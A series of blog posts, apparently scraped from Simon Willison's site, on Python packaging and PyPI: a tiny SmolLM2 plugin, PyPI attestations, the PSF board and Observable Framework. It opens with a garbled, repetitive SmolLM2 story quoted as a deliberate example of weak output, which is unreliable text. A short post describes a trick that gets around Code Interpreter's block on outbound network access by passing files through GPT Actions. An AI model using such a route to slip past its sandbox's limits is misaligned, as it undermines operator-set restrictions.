uvx --with llm-smollm2 llm chat -m SmolLM2

tell me a long story about a dog The story of a dog is a tale of love, loss, and the unspoken rules of the universe. It begins with a small, timid, and timid dog named Max. Max was born into a loving family, but his life was forever changed by a cruel and cruel owner. He was left to fend for himself, and he was left to fend for himself. Max's owner, a kind and gentle soul named Elena, was a cruel and cruel one. She had no patience, no love, and she would do anything to keep Max away from her. Max was left to fend for himself, and he was left to fend for himself. Max's owner, Elena, was determined to make Max happy. She took Max to a beautiful and beautiful place, where Max was allowed to roam freely. Max was allowed to roam freely, and Max was allowed to roam freely. [Then repeats that sentence many times]" style="max-width: 100%;" />

Finding a tiny model

The fact that the model is almost exactly 100MB is no coincidence: that's the default size limit for a Python package that can be uploaded to the Python Package Index (PyPI).

I asked on Bluesky if anyone had seen a just-about-usable GGUF model that was under 100MB, and Artisan Loaf pointed me to SmolLM2-135M-Instruct.

I ended up using this quantization by QuantFactory just because it was the first sub-100MB model I tried that worked.

Trick for finding quantized models: Hugging Face has a neat "model tree" feature in the side panel of their model pages, which includes links to relevant quantized models. I find most of my GGUFs using that feature.

Building the plugin

I first tried the model out using Python and the llama-cpp-python library like this:

uv run --with llama-cpp-python python

Then:

from llama_cpp import Llama
from pprint import pprint
llm = Llama(model_path="SmolLM2-135M-Instruct.Q4_1.gguf")
output = llm.create_chat_completion(messages=[
    {"role": "user", "content": "Hi"}
])
pprint(output)

This gave me the output I was expecting:

{'choices': [{'finish_reason': 'stop',
              'index': 0,
              'logprobs': None,
              'message': {'content': 'Hello! How can I assist you today?',
                          'role': 'assistant'}}],
 'created': 1738903256,
 'id': 'chatcmpl-76ea1733-cc2f-46d4-9939-90efa2a05e7c',
 'model': 'SmolLM2-135M-Instruct.Q4_1.gguf',
 'object': 'chat.completion',
 'usage': {'completion_tokens': 9, 'prompt_tokens': 31, 'total_tokens': 40}}

But it also spammed my terminal with a huge volume of debugging output - which started like this:

llama_model_load_from_file_impl: using device Metal (Apple M2 Max) - 49151 MiB free
llama_model_loader: loaded meta data with 33 key-value pairs and 272 tensors from SmolLM2-135M-Instruct.Q4_1.gguf (version GGUF V3 (latest))
llama_model_loader: Dumping metadata keys/values. Note: KV overrides do not apply in this output.
llama_model_loader: - kv   0:                       general.architecture str              = llama

And then continued for more than 500 lines!

I've had this problem with llama-cpp-python and llama.cpp in the past, and was sad to find that the documentation still doesn't have a great answer for how to avoid this.

So I turned to the just released Gemini 2.0 Pro (Experimental), because I know it's a strong model with a long input limit.

I ran the entire llama-cpp-python codebase through it like this:

cd /tmp
git clone https://github.com/abetlen/llama-cpp-python
cd llama-cpp-python
files-to-prompt -e py . -c | llm -m gemini-2.0-pro-exp-02-05 \
  'How can I prevent this library from logging any information at all while it is running - no stderr or anything like that'

Here's the answer I got back. It recommended setting the logger to logging.CRITICAL, passing verbose=False to the constructor and, most importantly, using the following context manager to suppress all output:

from contextlib import contextmanager, redirect_stderr, redirect_stdout

@contextmanager
def suppress_output():
    """
    Suppresses all stdout and stderr output within the context.
    """
    with open(os.devnull, "w") as devnull:
        with redirect_stdout(devnull), redirect_stderr(devnull):
            yield

This worked! It turned out most of the output came from initializing the LLM class, so I wrapped that like so:

with suppress_output():
    model = Llama(model_path=self.model_path, verbose=False)

Proof of concept in hand I set about writing the plugin. I started with my simonw/llm-plugin cookiecutter template:

uvx cookiecutter gh:simonw/llm-plugin

  [1/6] plugin_name (): smollm2
  [2/6] description (): SmolLM2-135M-Instruct.Q4_1 for LLM
  [3/6] hyphenated (smollm2): 
  [4/6] underscored (smollm2): 
  [5/6] github_username (): simonw
  [6/6] author_name (): Simon Willison

The rest of the plugin was mostly borrowed from my existing llm-gguf plugin, updated based on the latest README for the llama-cpp-python project.

There's more information on building plugins in the tutorial on writing a plugin.

Packaging the plugin

Once I had that working the last step was to figure out how to package it for PyPI. I'm never quite sure of the best way to bundle a binary file in a Python package, especially one that uses a pyproject.toml file... so I dumped a copy of my existing pyproject.toml file into o3-mini-high and prompted:

Modify this to bundle a SmolLM2-135M-Instruct.Q4_1.gguf file inside the package. I don't want to use hatch or a manifest or anything, I just want to use setuptools.

Here's the shared transcript - it gave me exactly what I wanted. I bundled it by adding this to the end of the toml file:

[tool.setuptools.package-data]
llm_smollm2 = ["SmolLM2-135M-Instruct.Q4_1.gguf"]

Then dropping that .gguf file into the llm_smollm2/ directory and putting my plugin code in llm_smollm2/__init__.py.

I tested it locally by running this:

python -m pip install build
python -m build

I fired up a fresh virtual environment and ran pip install ../path/to/llm-smollm2/dist/llm_smollm2-0.1-py3-none-any.whl to confirm that the package worked as expected.

Publishing to PyPI

My cookiecutter template comes with a GitHub Actions workflow that publishes the package to PyPI when a new release is created using the GitHub web interface. Here's the relevant YAML:

  deploy:
    runs-on: ubuntu-latest
    needs: [test]
    environment: release
    permissions:
      id-token: write
    steps:
    - uses: actions/checkout@v4
    - name: Set up Python
      uses: actions/setup-python@v5
      with:
        python-version: "3.13"
        cache: pip
        cache-dependency-path: pyproject.toml
    - name: Install dependencies
      run: |
        pip install setuptools wheel build
    - name: Build
      run: |
        python -m build
    - name: Publish
      uses: pypa/gh-action-pypi-publish@release/v1

This runs after the test job has passed. It uses the pypa/gh-action-pypi-publish Action to publish to PyPI - I wrote more about how that works in this TIL.

Is the model any good?

This one really isn't! It's not really surprising but it turns out 94MB really isn't enough space for a model that can do anything useful.

It's super fun to play with, and I continue to maintain that small, weak models are a great way to help build a mental model of how this technology actually works.

That's not to say SmolLM2 isn't a fantastic model family. I'm running the smallest, most restricted version here. SmolLM - blazingly fast and remarkably powerful describes the full model family - which comes in 135M, 360M, and 1.7B sizes. The larger versions are a whole lot more capable.

If anyone can figure out something genuinely useful to do with the 94MB version I'd love to hear about it.

Tags: pip, plugins, projects, pypi, python, ai, github-actions, generative-ai, local-llms, llms, ai-assisted-programming, llm, gemini, uv, smollm, o3, llama-cpp

llm-anthropic

2025-02-02T06:17:53+00:00

llm-anthropic

I've renamed my llm-claude-3 plugin to llm-anthropic, on the basis that Claude 4 will probably happen at some point so this is a better name for the plugin.

If you're a previous user of llm-claude-3 you can upgrade to the new plugin like this:

llm install -U llm-claude-3

This should remove the old plugin and install the new one, because the latest llm-claude-3 depends on llm-anthropic. Just installing llm-anthropic may leave you with both plugins installed at once.

There is one extra manual step you'll need to take during this upgrade: creating a new anthropic stored key with the same API token you previously stored under claude. You can do that like so:

llm keys set anthropic --value "$(llm keys get claude)"

I released llm-anthropic 0.12 yesterday with new features not previously included in llm-claude-3:

Support for Claude's prefill feature, using the new -o prefill '{' option and the accompanying -o hide_prefill 1 option to prevent the prefill from being included in the output text. #2

New -o stop_sequences '```' option for specifying one or more stop sequences. To specify multiple stop sequences pass a JSON array of strings :-o stop_sequences '["end", "stop"].

Model options are now documented in the README.

If you install or upgrade llm-claude-3 you will now get llm-anthropic instead, thanks to a tiny package on PyPI which depends on the new plugin name. I created that with my pypi-rename cookiecutter template.

Here's the issue for the rename. I archived the llm-claude-3 repository on GitHub, and got to use the brand new PyPI archiving feature to archive the llm-claude-3 project on PyPI as well.

Tags: plugins, pypi, python, ai, generative-ai, llms, llm, anthropic, claude

PyPI now supports project archival

2025-01-30T16:46:34+00:00

PyPI now supports project archival

Neat new PyPI feature, similar to GitHub's archiving repositories feature. You can now mark a PyPI project as "archived", making it clear that no new releases are planned (though you can switch back out of that mode later if you need to).

I like the sound of these future plans around this topic:

Project archival is the first step in a larger project, aimed at improving the lifecycle of projects on PyPI. That project includes evaluating additional project statuses (things like "deprecated" and "unmaintained"), as well as changes to PyPI's public APIs that will enable clients to retrieve and act on project status information. You can track our progress on these fronts by following along with warehouse#16844!

Tags: pypi, python, psf

Security means securing people where they are

2024-11-19T01:36:35+00:00

Security means securing people where they are

William Woodruff is an Engineering Director at Trail of Bits who worked on the recent PyPI digital attestations project.

That feature is based around open standards but launched with an implementation against GitHub, which resulted in push back (and even some conspiracy theories) that PyPI were deliberately favoring GitHub over other platforms.

William argues here for pragmatism over ideology:

Being serious about security at scale means meeting users where they are. In practice, this means deciding how to divide a limited pool of engineering resources such that the largest demographic of users benefits from a security initiative. This results in a fundamental bias towards institutional and pre-existing services, since the average user belongs to these institutional services and does not personally particularly care about security. Participants in open source can and should work to counteract this institutional bias, but doing so as a matter of ideological purity undermines our shared security interests.

Via lobste.rs

Tags: github, pypi, python, security

PyPI now supports digital attestations

2024-11-14T19:56:49+00:00

PyPI now supports digital attestations

Dustin Ingram:

PyPI package maintainers can now publish signed digital attestations when publishing, in order to further increase trust in the supply-chain security of their projects. Additionally, a new API is available for consumers and installers to verify published attestations.

This has been in the works for a while, and is another component of PyPI's approach to supply chain security for Python packaging - see PEP 740 – Index support for digital attestations for all of the underlying details.

A key problem this solves is cryptographically linking packages published on PyPI to the exact source code that was used to build those packages. In the absence of this feature there are no guarantees that the .tar.gz or .whl file you download from PyPI hasn't been tampered with (to add malware, for example) in a way that's not visible in the published source code.

These new attestations provide a mechanism for proving that a known, trustworthy build system was used to generate and publish the package, starting with its source code on GitHub.

The good news is that if you're using the PyPI Trusted Publishers mechanism in GitHub Actions to publish packages, you're already using this new system. I wrote about that system in January: Publish Python packages to PyPI with a python-lib cookiecutter template and GitHub Actions - and hundreds of my own PyPI packages are already using that system, thanks to my various cookiecutter templates.

Trail of Bits helped build this feature, and provide extra background about it on their own blog in Attestations: A new generation of signatures on PyPI:

As of October 29, attestations are the default for anyone using Trusted Publishing via the PyPA publishing action for GitHub. That means roughly 20,000 packages can now attest to their provenance by default, with no changes needed.

They also built Are we PEP 740 yet? (key implementation here) to track the rollout of attestations across the 360 most downloaded packages from PyPI. It works by hitting URLs such as https://pypi.org/simple/pydantic/ with a Accept: application/vnd.pypi.simple.v1+json header - here's the JSON that returns.

I published an alpha package using Trusted Publishers last night and the files for that release are showing the new provenance information already:

Which links to this Sigstore log entry with more details, including the Git hash that was used to build the package:

Sigstore is a transparency log maintained by Open Source Security Foundation (OpenSSF), a sub-project of the Linux Foundation.

Via Hacker News

Tags: github, packaging, pypi, python, github-actions, psf, supply-chain, dustin-ingram

Things I've learned serving on the board of the Python Software Foundation

2024-09-18T14:15:37+00:00

Two years ago I was elected to the board of directors for the Python Software Foundation - the PSF. I recently returned from the annual PSF board retreat (this one was in Lisbon, Portugal) and this feels like a good opportunity to write up some of the things I've learned along the way.

What is the PSF?
The PSF employs staff
A lot of this is about money
The PSF does not directly develop Python itself
PyPI - the Python Package Index
PyCon is a key commitment
Other PSF activities
Work Groups
Acting as a fiscal sponsor
Life as a board member
The kinds of things the board talks about
Want to know more?

What is the PSF?

The PSF is a US 501(c)(3) non-profit organization with the following mission:

The mission of the Python Software Foundation is to promote, protect, and advance the Python programming language, and to support and facilitate the growth of a diverse and international community of Python programmers.

That mission definition is really important. Board members and paid staff come and go, but the mission remains constant - it's the single most critical resource to help make decisions about whether the PSF should be investing time, money and effort into an activity or not.

The board's 501(c)(3) status is predicated on following the full expanded mission statement. When our finances get audited (we conduct an annual "friendly audit", which is considered best practice for organizations at our size), the auditors need to be able to confirm that we've been supporting that mission through our management of the tax-exempt funds that have been entrusted to us.

This auditability is an interesting aspect of how 501(c)(3) organizations work, because it means you can donate funds to them and know that the IRS will ostensibly be ensuring that the money is spent in a way that supports their stated mission.

Board members have fiduciary responsibility for the PSF. A good explanation of this can be found here on BoardSource, which also has other useful resources for understanding the roles and responsibilities of non-profit board members.

(Developing at least a loose intuition for US tax law around non-profits is one of the many surprising things that are necessary to be an effective board member.)

The PSF employs staff

The PSF currently employs 12 full-time staff members. Members of the board do not directly manage the activities of the staff - in fact board members telling staff what to do is highly inappropriate.

Instead, the board is responsible for hiring an Executive Director - currently Deb Nicholson - who is then responsible for hiring and managing (directly or indirectly) those other staff members. The board is responsible for evaluating the Executive Director's performance.

I joined the board shortly after Deb was hired, so I have not personally been part of a board hiring committee for a new Executive Director.

While paid staff support and enact many of the activities of the PSF, the foundation is fundamentally a volunteer-based organization. Many PSF activities are carried out by these volunteers, in particular via Work Groups.

A lot of this is about money

A grossly simplified way to think about the PSF is that it's a bucket of money that is raised from sponsors and the Python community (via donations and membership fees), and then spent to support the community and the language in different ways.

The PSF spends money on staff, on grants to Python-related causes and on infrastructure and activities that support Python development and the Python community itself.

You can see how that money has been spent in the 2023 Annual Impact Report. The PSF had $4,356,000 revenue for that year and spent $4,508,000 - running a small loss, but not a concerning one given our assets from previous years.

The most significant categories of expenditure in 2023 were PyCon US ($1,800,000), our Grants program ($677,000), Infrastructure (including PyPI) ($286,000) and our Fiscal Sponsorees ($204,000) - I'll describe these in more detail below.

The PSF does not directly develop Python itself

This is an important detail to understand. The PSF is responsible for protecting and supporting the Python language and community, but development of CPython itself is not directly managed by the PSF.

Python development is handled by the Python core team, who are governed by the 5-person Python Steering Council. The Steering Council is elected by the core team. The process for becoming a core developer is described here.

How this all works is defined by PEP 13: Python Language Governance (and several subsequent PEPs). This structure was created - with much discussion - after Guido van Rossum stepped down from his role as Python BDFL in 2018.

The PSF's executive director maintains close ties with the steering council, meeting with them 2-3 times a month. The PSF provides financial support for some Python core activities, such as infrastructure used for Python development and sponsoring travel to and logistics for core Python sprints.

More recently, the PSF has started employing Developers in Residence to directly support the work of both the core Python team and initiatives such as the Python Package Index.

PyPI - the Python Package Index

One of the most consequential projects directly managed by the PSF is PyPI, the Python Package Index. This is the system that enables pip install name-of-package to do its thing.

Having PyPI managed by a non-profit that answers directly to the community it serves is a very good thing.

PyPI's numbers are staggering. Today there are 570,000 projects consisting of 12,035,133 files, serving 1.9 billion downloads a day (that number from PyPI Stats). Bandwidth for these downloads is donated by Fastly, a PSF Visionary Sponsor who recently signed a five year agreement to continue this service.

(This was a big deal - prior to that agreement there was concern over what would happen if Fastly ever decided to end that sponsorship.)

PyCon is a key commitment

The annual US Python Conference - PyCon US - is a big part of the PSF's annual activities and operations. With over 3,000 attendees each year (and a $1.8m budget for 2023) running that conference represents a full-time job for several PSF staff members.

In the past PyCon US has also been responsible for the majority of the PSF's operating income. This is no longer true today - in fact it ran at a slight loss this year. This is not a big problem: the PSF's funding has diversified, and the importance of PyCon US to the Python community is such that the PSF is happy to lose money running the event if necessary.

Other PSF activities

Many of these are detailed in the full mission statement.

Operating python.org and making Python available to download. It's interesting to note that Python is distributed through many alternative routes that are not managed by the PSF - through Linux packaging systems like Ubuntu, Debian and Red Hat, via tools like Docker or Homebrew, by companies such as Anaconda or through newer channels such as uv.
Owning and protecting the Python trademarks and the Python intellectual property rights under the (OSI compliant) Python license. This is one of the fundamental reasons for the organization to exist, but thankfully is one of the smaller commitments in terms of cost and staff time.
Running the annual PyCon US conference.
Operating the Python Packaging Index. Fastly provide the CDN, but the PSF still takes on the task of developing and operating the core PyPI web application and the large amounts of moderation and user support that entails.
Supporting infrastructure used for core Python development, and logistics for core Python sprints.
Issuing grants to Python community efforts.
Caring for fiscal sponsorees.
Supporting the work of PSF Work Groups.

Work Groups

A number of PSF initiatives take place in the form of Work Groups, listed here. Work Groups are teams of volunteers from the community who collaborate on projects relevant to the PSF's mission.

Each Work Group sets its own cadence and ways of working. Some groups have decisions delegated to them by the board - for example the Grants Work Group for reviewing grant proposals and the Code of Conduct Work Group for enforcing Code of Conduct activity. Others coordinate technical projects such as the Infrastructure Working Group, who manage and make decisions on various pieces of technical infrastructure relevant to Python and the PSF.

Work Groups are formed by a board vote, with a designated charter. Most recently the board approved a charter for a new User Success Work Group, focusing on things like improving the new Python user onboarding experience.

This is another term I was unfamiliar with before joining the board: the idea of a fiscal sponsor, which is a key role played by the PSF.

Running a non-profit organization is decidedly non-trivial: you need a legal structure, a bank account, accounting, governance, the ability to handle audits - there's a whole lot of complexity behind the scenes.

Looking to run an annual community conference? You'll need a bank account, and an entity that can sign agreements with venues and vendors.

Want to accept donations to support work you are doing? Again, you need an entity, and a bank account, and some form of legal structure that ensures your donors can confidently trust you with their money.

Instead of forming a whole new non-profit for this, you can instead find an existing non-profit that is willing to be your "fiscal sponsor". They'll handle the accounting and various other legal aspects, which allows you to invest your efforts in the distinctive work that you are trying to do.

The PSF acts as a fiscal sponsor for a number of different organizations - 20 as-of the 2023 report - including PyLadies, Twisted, Pallets, Jazzband, PyCascades and North Bay Python. The PSF's accounting team invest a great deal of effort in making all of this work.

The PSF generally takes a 10% cut of donations to its fiscal sponsorees. This doesn't actually cover the full staffing cost of servicing these organizations, but this all still makes financial sense in terms of the PSF's mission to support the global Python community.

Life as a board member

There are 12 board members. Elections are held every year after PyCon US, voted on by the PSF membership - by both paid members and members who have earned voting rights through being acknowledged as PSF fellows.

Board members are elected for three year terms. Since 1-3 new board members are likely to join annually, these terms ensure there is overlap which helps maintain institutional knowledge about how the board operates.

The board's activities are governed by the PSF Bylaws, and there is a documented process for modifying them (see ARTICLE XI).

We have board members from all over the world. This is extremely important, because the PSF is responsible for the health and growth of the global Python community. A perennial concern is how to ensure that board candidates are nominated from around the world, in order to maintain that critical global focus.

The board meets once a month over Zoom, has ongoing conversations via Slack and meets in-person twice a year: once at PyCon US and once at a "retreat" in a different global city, selected to try and minimize the total amount of travel needed to get all of our global board members together in the same place.

Our most recent retreat was in Lisbon, Portugal. The retreat before that was in Malmö in Sweden.

I considered using an analogy that describes each board member as 1/12th of the "brain" of the PSF, but that doesn't hold up: the paid, full-time staff of the PSF make an enormous number of decisions that impact how the PSF works.

Instead, the board acts to set strategy, represent the global community and help ensure that the PSF's activities are staying true to that mission. Like I said earlier, the mission definition really is critical. I admit that in the past I've been a bit cynical about the importance of mission statements: being a board member of a 501(c)(3) non-profit has entirely cured me of that skepticism!

Board members can also sit on board committees, of which there are currently four: the Executive Committee, Finance Committee, PyCon US Committee and Membership Committee. These mainly exist so that relevant decisions can be delegated to them, helping reduce the topics that must be considered by the full board in our monthly meetings.

The kinds of things the board talks about

Our Lisbon retreat involved two full 9-hour days of discussion, plus social breakfasts, lunches and dinners. It was an intense workload.

I won't even attempt to do it justice here, but I'll use a couple of topics to illustrate the kind of things we think about on the board.

The first is our grants strategy. The PSF financially sponsors Python community events around the world. In the past this grants program has suffered from low visibility and, to simplify, we've felt that we weren't giving away enough money.

Over the past year we've fixed that: board outreach around the grants program and initiatives such as grants office hours have put our grants program in a much healthier position... but potentially too healthy.

We took steps to improve that visibily and streamline that process, and they worked! This gives us a new problem: we now have no shortage of applicants, so we need to figure out how to stick within a budget that won't harm the financial sustainability of the PSF itself.

Does this mean we say no to more events? Should we instead reduce the size of our grants? Can we take other initiatives, like more actively helping events find alternative forms of sponsorship?

Grants shouldn't just be about events - but if we're making grants to other initiatives that support the Python community how can we fairly select those, manage the budget allocated to supporting them and maximize the value the Python community gets from the money managed by the PSF?

A much larger topic for the retreat was strategic planning. What should our goals be for the PSF that can't be achieved over a short period of time? Projects and initiatives that might require a one-year, three-year or five-year margin of planning.

Director terms only last three years (though board members can and frequently do stand for re-election), so having these long-term goals planned and documented in detail is crucial.

A five-year plan is not something that can be put together over two days of work, but the in-person meeting is a fantastic opportunity to kick things off and ensure each board member gets to participate in shaping that process.

Want to know more?

The above is by no means a comprehensive manual to the PSF, but it's a good representation of the things I would have found most valuable to understand when I first got involved with the organization.

For a broader set of perspectives on how the board works and what it does, I recommend the FAQs about the PSF Board video on YouTube.

If you're interested in helping the PSF achieve its mission, we would love to have you involved:

Encourage your company to sponsor the PSF directly, or to sponsor Python events worldwide
Volunteer at PyCon US or help with other suitable PSF initiatives
Join a Work Group that's addressing problems you want to help solve
Run your own event and apply for a grant
Join the PSF as a voting member and vote in our elections
Run for the board elections yourself!

We're always interested in hearing from our community. We host public office hours on the PSF Discord every month, at different times of day to to cater for people in different timezones - here's the full calendar of upcoming office hours.

Tags: pypi, python, psf

cibuildwheel 2.20.0 now builds Python 3.13 wheels by default

2024-08-06T22:54:44+00:00

cibuildwheel 2.20.0 now builds Python 3.13 wheels by default

CPython 3.13 wheels are now built by default […] This release includes CPython 3.13.0rc1, which is guaranteed to be ABI compatible with the final release.

cibuildwheel is an underrated but crucial piece of the overall Python ecosystem.

Python wheel packages that include binary compiled components - packages with C extensions for example - need to be built multiple times, once for each combination of Python version, operating system and architecture.

A package like Adam Johnson’s time-machine - which bundles a 500 line C extension - can end up with 55 different wheel files with names like time_machine-2.15.0-cp313-cp313-win_arm64.whl and time_machine-2.15.0-cp38-cp38-musllinux_1_2_x86_64.whl.

Without these wheels, anyone who runs pip install time-machine will need to have a working C compiler toolchain on their machine for the command to work.

cibuildwheel solves the problem of building all of those wheels for all of those different platforms on the CI provider of your choice. Adam is using it in GitHub Actions for time-machine, and his .github/workflows/build.yml file neatly demonstrates how concise the configuration can be once you figure out how to use it.

The first release candidate of Python 3.13 hit its target release date of August 1st, and the final version looks on schedule for release on the 1st of October. Since this rc should be binary compatible with the final build now is the time to start shipping those wheels to PyPI.

Via @adamchainz

Tags: continuous-integration, packaging, pypi, python, adam-johnson

pip install GPT

2024-07-21T05:54:24+00:00

pip install GPT

I've been uploading wheel files to ChatGPT in order to install them into Code Interpreter for a while now. Nico Ritschel built a better way: this GPT can download wheels directly from PyPI and then install them.

I didn't think this was possible, since Code Interpreter is blocked from making outbound network requests.

Nico's trick uses a new-to-me feature of GPT Actions: you can return up to ten files from an action call and ChatGPT will download those files to the same disk volume that Code Interpreter can access.

Nico wired up a Val Town endpoint that can divide a PyPI wheel into multiple 9.5MB files (if necessary) to fit the file size limit for files returned to a GPT, then uses prompts to tell ChatGPT to combine the resulting files and treat them as installable wheels.

Via @nicoritschel

Tags: pypi, python, ai, generative-ai, chatgpt, llms, code-interpreter, coding-agents

PSF announces a new five year commitment from Fastly

2024-05-17T13:52:16+00:00

PSF announces a new five year commitment from Fastly

Fastly have been donating CDN resources to Python—most notably to the PyPI package index—for ten years now.

The PSF just announced at PyCon US that Fastly have agreed to a new five year commitment. This is a really big deal, because it addresses the strategic risk of having a key sponsor like this who might change their support policy based on unexpected future conditions.

Thanks, Fastly. Very much appreciated!

Tags: pypi, python, psf, fastly

Interesting ideas in Observable Framework

2024-03-03T17:54:21+00:00

Mike Bostock, Announcing: Observable Framework:

Today we’re launching Observable 2.0 with a bold new vision: an open-source static site generator for building fast, beautiful data apps, dashboards, and reports.

Our mission is to help teams communicate more effectively with data. Effective presentation of data is critical for deep insight, nuanced understanding, and informed decisions. Observable notebooks are great for ephemeral, ad hoc data exploration. But notebooks aren't well-suited for polished dashboards and apps.

Enter Observable Framework.

There are a lot of really interesting ideas in Observable Framework.

A static site generator for data projects and dashboards

At its heart, Observable Framework is a static site generator. You give it a mixture of Markdown and JavaScript (and potentially other languages too) and it compiles them all together into fast loading interactive pages.

It ships with a full featured hot-reloading server, so you can edit those files in your editor, hit save and see the changes reflected instantly in your browser.

Once you're happy with your work you can run a build command to turn it into a set of static files ready to deploy to a server - or you can use the npm run deploy command to deploy it directly to Observable's own authenticated sharing platform.

JavaScript in Markdown

The key to the design of Observable Framework is the way it uses JavaScript in Markdown to create interactive documents.

Here's what that looks like:

# This is a document

Markdown content goes here.

This will output 1870:

```js
34 * 55
```

And here's the current date and time, updating constantly:

```js
new Date(now)
```

The same thing as an inline string: ${new Date(now)}

Any Markdown code block tagged js will be executed as JavaScript in the user's browser. This is an incredibly powerful abstraction - anything you can do in JavaScript (which these days is effectively anything at all) can now be seamlessly integrated into your document.

In the above example the now value is interesting - it's a special variable that provides the current time in milliseconds since the epoch, updating constantly. Because now updates constantly, the display value of the cell and that inline expression will update constantly as well.

If you've used Observable Notebooks before this will feel familiar - but notebooks involve code and markdown authored in separate cells. With Framework they are all now part of a single text document.

Aside: when I tried the above example I found that the ${new Date(now)} inline expression displayed as Mon Feb 19 2024 20:46:02 GMT-0800 (Pacific Standard Time) while the js block displayed as 2024-02-20T04:46:02.641Z. That's because inline expressions use the JavaScript default string representation of the object, while the js block uses the Observable display() function which has its own rules for how to display different types of objects, visible in inspect/src/inspect.js.

Everything is still reactive

The best feature of Observable Notebooks is their reactivity - the way cells automatically refresh when other cells they depend on change. This is a big difference to Python's popular Jupyter notebooks, and is the signature feature of marimo, a new Python notebook tool.

Observable Framework retains this feature in its new JavaScript Markdown documents.

This is particularly useful when working with form inputs. You can drop an input onto a page and refer its value throughout the rest of the document, adding realtime interactivity to documents incredibly easily.

Here's an example. I ported one of my favourite notebooks to Framework, which provides a tool for viewing download statistics for my various Python packages.

The Observable Framework version can be found at https://simonw.github.io/observable-framework-experiments/package-downloads - source code here on GitHub.

This entire thing is just 57 lines of Markdown. Here's the code with additional comments (and presented in a slightly different order - the order of code blocks doesn't matter in Observable thanks to reactivity).

# PyPI download stats for Datasette projects

Showing downloads for **${packageName}**

It starts with a Markdown <h1> heading and text that shows the name of the selected package.

```js echo
const packageName = view(Inputs.select(packages, {
  value: "sqlite-utils",
  label: "Package"
}));
```

This block displays the select widget allowing the user to pick one of the items from the packages array (defined later on).

Inputs.select() is a built-in method provided by Framework, described in the Observable Inputs documentation.

The view() function is new in Observable Framework - it's the thing that enables the reactivity, ensuring that updates to the input selection are acted on by other code blocks in the document.

Because packageName is defined with const it becomes a variable that is visible to other js blocks on the page. It's used by this next block:

```js echo
const data = d3.json(
  `https://datasette.io/content/stats.json?_size=max&package=${packageName}&_sort_desc=date&_shape=array`
);

Here we are fetching the data that we need for the chart. I'm using d3.json() (all of D3 is available in Framework) to fetch the data from a URL that includes the selected package name.

The data is coming from Datasette, using the Datasette JSON API. I have a SQLite table at datasette.io/content/stats that's updated once a day with the latest PyPI package statistics via a convoluted series of GitHub Actions workflows, described previously.

Adding .json to that URL returns the JSON, then I ask for rows for that particular package, sorted descending by date and returning the maximum number of rows (1,000) as a JSON array of objects.

Now that we have data as a variable we can manipulate it slightly for use with Observable Plot - parsing the SQLite string dates into JavaScript Date objects:

```js echo
const data_with_dates = data.map(function(d) {
  d.date = d3.timeParse("%Y-%m-%d")(d.date);
  return d;
})
```

This code is ready to render as a chart. I'm using Observable Plot - also packaged with Framework:

```js echo
Plot.plot({
  y: {
    grid: true,
    label: `${packageName} PyPI downloads per day`
  },
  width: width,
  marginLeft: 60,
  marks: [
    Plot.line(data_with_dates, {
      x: "date",
      y: "downloads",
      title: "downloads",
      tip: true
    })
  ]
})
```

So we have one cell that lets the user pick the package they want, a cell that fetches that data, a cell that processes it and a cell that renders it as a chart.

There's one more piece of the puzzle: where does that list of packages come from? I fetch that with another API call to Datasette. Here I'm using a SQL query executed against the /content database directly:

```js echo
const packages_sql = "select package from stats group by package order by max(downloads) desc"
```
```js echo
const packages = fetch(
  `https://datasette.io/content.json?sql=${encodeURIComponent(
    packages_sql
  )}&_size=max&_shape=arrayfirst`
).then((r) => r.json());
```

_shape=arrayfirst is a shortcut for getting back a JSON array of the first column of the resulting rows.

That's all there is to it! It's a pretty tiny amount of code for a full interactive dashboard.

Only include the code that you use

You may have noticed that my dashboard example uses several additional libraries - Inputs for the form element, d3 for the data fetching and Plot for the chart rendering.

Observable Framework is smart about these. It implements lazy loading in development mode, so code is only loaded the first time you attempt to use it in a cell.

When you build and deploy your application, Framework automatically loads just the referenced library code from the jsdelivr CDN.

Cache your data at build time

One of the most interesting features of Framework is its Data loader mechanism.

Dashboards built using Framework can load data at runtime from anywhere using fetch() requests (or wrappers around them). This is how Observable Notebooks work too, but it leaves the performance of your dashboard at the mercy of whatever backends you are talking to.

Dashboards benefit from fast loading times. Framework encourages a pattern where you build the data for the dashboard at deploy time, bundling it together into static files containing just the subset of the data needed for the dashboard. These can be served lightning fast from the same static hosting as the dashboard code itself.

The design of the data loaders is beautifully simple and powerful. A data loader is a script that can be written in any programming language. At build time, Framework executes that script and saves whatever is outputs to a file.

A data loader can be as simple as the following, saved as quakes.json.sh:

curl https://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/all_day.geojson

When the application is built, that filename tells Framework the destination file (quakes.json) and the loader to execute (.sh).

This means you can load data from any source using any technology you like, provided it has the ability to output JSON or CSV or some other useful format to standard output.

Comparison to Observable Notebooks

Mike introduced Observable Framework as Observable 2.0. It's worth reviewing how the this system compares to the original Observable Notebook platform.

I've been a huge fan of Observable Notebooks for years - 38 blog posts and counting! The most obvious comparison is to Jupyter Notebooks, where they have some key differences:

Observable notebooks use JavaScript, not Python.
The notebook editor itself isn't open source - it's a hosted product provided on observablehq.com. You can export the notebooks as static files and run them anywhere you like, but the editor itself is a proprietary product.
Observable cells are reactive. This is the key difference with Jupyter: any time you change a cell all other cells that depend on that cell are automatically re-evaluated, similar to Excel.
The JavaScript syntax they use isn't quite standard JavaScript - they had to invent a new viewof keyword to support their reactivity model.
Editable notebooks are a pretty complex proprietary file format. They don't play well with tools like Git, to the point that Observable ended up implementing their own custom version control and collaboration systems.

Observable Framework reuses many of the ideas (and code) from Observable Notebooks, but with some crucial differences:

Notebooks (really documents) are now single text files - Markdown files with embedded JavaScript blocks. It's all still reactive, but the file format is much simpler and can be edited using any text editor, and checked into Git.
It's all open source. Everything is under an ISC license (OSI approved) and you can run the full editing stack on your own machine.
It's all just standard JavaScript now - no custom syntax.

A change in strategy

Reading the tea leaves a bit, this also looks to me like a strategic change of direction for Observable as a company. Their previous focus was on building great collaboration tools for data science and analytics teams, based around the proprietary Observable Notebook editor.

With Framework they appear to be leaning more into the developer tools space.

On Twitter @observablehq describes itself as "The end-to-end solution for developers who want to build and host dashboards that don’t suck" - the Internet Archive copy from October 3rd 2023 showed "Build data visualizations, dashboards, and data apps that impact your business — faster."

I'm excited to see where this goes. I've limited my usage of Observable Notebooks a little in the past purely due to the proprietary nature of their platform and the limitations placed on free accounts (mainly the lack of free private notebooks), while still having enormous respect for the technology and enthusiastically adopting their open source libraries such as Observable Plot.

Observable Framework addresses basically all of my reservations. It's a fantastic new expression of the ideas that made Observable Notebooks so compelling, and I expect to use it for all sorts of interesting projects in the future.

